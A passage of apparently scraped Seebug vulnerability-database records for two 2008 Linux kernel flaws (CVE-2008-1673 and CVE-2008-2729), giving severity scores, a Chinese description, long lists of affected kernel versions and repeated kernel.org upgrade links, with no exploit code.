href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.22 .17\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.22 .4\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.22 .11\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.22 .12\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.23 -rc1\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.23 -rc2\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.24 -rc3\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.24 -rc5\r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>\r\n\r\n\r\nLinux kernel 2.6.25 \r\n\r\nLinux patch-2.6.26-rc5-git1.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.26-rc5</a> -git1.bz2\r\n\r\nLinux linux-2.6.25.5.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.5.tar.bz2</a>", "published": "2008-08-22T00:00:00", "title": "Linux Kernel BER Decoding Remote Buffer Overflow Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1673"], "modified": "2008-08-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3896", "id": "SSV:3896", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T21:37:53", "description": "BUGTRAQ ID: 29943\r\nCVE ID\uff1aCVE-2008-2729\r\nCNCVE ID\uff1aCNCVE-20082729\r\n\r\nLinux\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\u90e8\u5206AMD64\u7cfb\u7edf\u4e0a\u7684Linux\u5185\u6838\u5185\u5b58\u62f7\u8d1d\u51fd\u6570\u5b58\u5728\u7f3a\u9677\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u83b7\u5f97\u654f\u611f\u4fe1\u606f\u3002\r\n\u5728\u90e8\u5206AMC64\u7cfb\u7edf\u4e0a\uff0c\u5982\u679c\u4ece\u6e90\u5730\u5740\u62f7\u8d1d\u5185\u6838\u5185\u5b58\u5230\u76ee\u7684\u5185\u5b58\u5730\u5740\u4e0d\u6210\u529f\uff0c\u62f7\u8d1d\u51fd\u6570\u5728\u76ee\u7684\u5185\u5b58\u4f4d\u7f6e\u533a\u57df\u6ca1\u6709\u5bf9\u5185\u5bb9\u8fdb\u884c\u6e05\u96f6\u64cd\u4f5c\uff0c\u8fd9\u53ef\u5bfc\u81f4\u975e\u7279\u6743\u7528\u6237\u83b7\u5f97\u654f\u611f\u4fe1\u606f\u3002\n\nRedHat Enterprise Linux WS 4\r\nRedHat Enterprise Linux ES 4\r\nRedHat Enterprise Linux Desktop 5 client\r\nRedHat Enterprise Linux AS 4\r\nRedHat Enterprise Linux 5 server\r\nRedHat Desktop 4.0\r\nLinux kernel 2.6.19 -rc4\r\nLinux kernel 2.6.19 -rc3\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.19 -rc2\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.19 -rc1\r\nLinux kernel 2.6.18 .4\r\nLinux kernel 2.6.18 .3\r\nLinux kernel 2.6.18 .1\r\nLinux kernel 2.6.18\r\nLinux kernel 2.6.17 .8\r\nLinux kernel 2.6.17 .7\r\nLinux kernel 2.6.17 .6\r\nLinux kernel 2.6.17 .5\r\nLinux kernel 2.6.17 .3\r\nLinux kernel 2.6.17 .2\r\nLinux kernel 2.6.17 .14\r\nLinux kernel 2.6.17 .13\r\nLinux kernel 2.6.17 .12\r\nLinux kernel 2.6.17 .11\r\nLinux kernel 2.6.17 .10\r\nLinux kernel 2.6.17 .1\r\nLinux kernel 2.6.17 -rc5\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\nLinux kernel 2.6.17\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.16 27\r\nLinux kernel 2.6.16 13\r\nLinux kernel 2.6.16 .9\r\nLinux kernel 2.6.16 .7\r\nLinux kernel 2.6.16 .23\r\nLinux kernel 2.6.16 .19\r\nLinux kernel 2.6.16 .12\r\nLinux kernel 2.6.16 .11\r\nLinux kernel 2.6.16 .1\r\nLinux kernel 2.6.16 -rc1\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\nLinux kernel 2.6.16\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.15 .4\r\nLinux kernel 2.6.15 .3\r\nLinux kernel 2.6.15 .2\r\nLinux kernel 2.6.15 .1\r\nLinux kernel 2.6.15 -rc3\r\nLinux kernel 2.6.15 -rc2\r\nLinux kernel 2.6.15 -rc1\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\nLinux kernel 2.6.15\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.14 .5\r\nLinux kernel 2.6.14 .4\r\nLinux kernel 2.6.14 .3\r\nLinux kernel 2.6.14 .2\r\nLinux kernel 2.6.14 .1\r\nLinux kernel 2.6.14 -rc4\r\nLinux kernel 2.6.14 -rc3\r\nLinux kernel 2.6.14 -rc2\r\nLinux kernel 2.6.14 -rc1\r\nLinux kernel 2.6.14\r\nLinux kernel 2.6.14\r\nLinux kernel 2.6.13 .4\r\nLinux kernel 2.6.13 .3\r\nLinux kernel 2.6.13 .2\r\nLinux kernel 2.6.13 .1\r\nLinux kernel 2.6.13 -rc7\r\nLinux kernel 2.6.13 -rc6\r\nLinux kernel 2.6.13 -rc4\r\nLinux kernel 2.6.13 -rc1\r\nLinux kernel 2.6.13\r\nLinux kernel 2.6.13\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.12 .6\r\nLinux kernel 2.6.12 .5\r\nLinux kernel 2.6.12 .4\r\nLinux kernel 2.6.12 .3\r\nLinux kernel 2.6.12 .22\r\nLinux kernel 2.6.12 .2\r\nLinux kernel 2.6.12 .12\r\nLinux kernel 2.6.12 .1\r\nLinux kernel 2.6.12 -rc5\r\nLinux kernel 2.6.12 -rc4\r\nLinux kernel 2.6.12 -rc1\r\nLinux kernel 2.6.12\r\nLinux kernel 2.6.12\r\nLinux kernel 2.6.11 .8\r\nLinux kernel 2.6.11 .7\r\nLinux kernel 2.6.11 .6\r\nLinux kernel 2.6.11 .5\r\nLinux kernel 2.6.11 .4\r\nLinux kernel 2.6.11 .12\r\nLinux kernel 2.6.11 .11\r\nLinux kernel 2.6.11 -rc4\r\nLinux kernel 2.6.11 -rc3\r\nLinux kernel 2.6.11 -rc2\r\nLinux kernel 2.6.11\r\nLinux kernel 2.6.11\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.10 rc2\r\nLinux kernel 2.6.10\r\n+ RedHat Fedora Core3\r\n+ RedHat Fedora Core2\r\n+ Trustix Secure Linux 3.0\r\n+ Ubuntu Ubuntu Linux 5.0 4 powerpc\r\n+ Ubuntu Ubuntu Linux 5.0 4 i386\r\n+ Ubuntu Ubuntu Linux 5.0 4 amd64\r\nLinux kernel 2.6.10\r\nLinux kernel 2.6.9\r\nLinux kernel 2.6.8 rc3\r\nLinux kernel 2.6.8 rc2\r\nLinux kernel 2.6.8 rc1\r\n+ Ubuntu Ubuntu Linux 4.1 ppc\r\n+ Ubuntu Ubuntu Linux 4.1 ia64\r\n+ Ubuntu Ubuntu Linux 4.1 ia32\r\nLinux kernel 2.6.8\r\nLinux kernel 2.6.7 rc1\r\nLinux kernel 2.6.7\r\nLinux kernel 2.6.6 rc1\r\nLinux kernel 2.6.6\r\nLinux kernel 2.6.5\r\nLinux kernel 2.6.4\r\nLinux kernel 2.6.3\r\nLinux kernel 2.6.2\r\nLinux kernel 2.6.1 -rc2\r\nLinux kernel 2.6.1 -rc1\r\nLinux kernel 2.6.1\r\nLinux kernel 2.6 .10\r\nLinux kernel 2.6 -test9-CVS\r\nLinux kernel 2.6 -test9\r\nLinux kernel 2.6 -test8\r\nLinux kernel 2.6 -test7\r\nLinux kernel 2.6 -test6\r\nLinux kernel 2.6 -test5\r\nLinux kernel 2.6 -test4\r\nLinux kernel 2.6 -test3\r\nLinux kernel 2.6 -test2\r\nLinux kernel 2.6 -test11\r\nLinux kernel 2.6 -test10\r\nLinux kernel 2.6 -test1\r\nLinux kernel 2.6\r\nLinux kernel 2.6.8.1\r\n+ S.u.S.E. Linux Personal 9.2 x86_64\r\n+ S.u.S.E. Linux Personal 9.2\r\n+ Ubuntu Ubuntu Linux 4.1 ppc\r\n+ Ubuntu Ubuntu Linux 4.1 ia64\r\n+ Ubuntu Ubuntu Linux 4.1 ia32\r\nLinux kernel 2.6.18-8.1.8.el5\r\nLinux kernel 2.6.18-53\r\nLinux kernel 2.6.18\r\nLinux kernel 2.6.15.5\r\nLinux kernel 2.6.15.11\r\nLinux kernel 2.6.15-27.48\r\nLinux kernel 2.6.11.4\n \u5347\u7ea7\u5185\u6838\uff1a\r\nLinux kernel 2.6.15-27.48\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6 -test6\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6 -test4\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6 -test2\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6 -test9-CVS\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6 -test7\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6 -test9\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6 -test10\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.1 -rc2\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.1\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.10 rc2\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.10\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.11\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.11 -rc3\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.11 .11\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.11 .7\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.12 .4\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.12 .1\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.12 -rc4\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.12 .12\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.12 .22\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.12 .2\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.12 -rc1\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.12 .3\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.13 -rc4\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.13\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.13 .3\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.13\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.14 .4\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.14 .1\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.14 .3\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.14 -rc2\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.14 .5\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.14 -rc3\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.15\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.15\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.15\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.15 -rc1\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.15 -rc3\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.15 .4\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.15\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.15\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16 .9\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16 .1\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16 .23\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16 -rc1\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16 27\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16 13\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.16 .11\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.19.tar.bz2</a>\r\nLinux kernel 2.6.17\r\nCuyahoga linux-2.6.19.tar.bz2\r\n<a 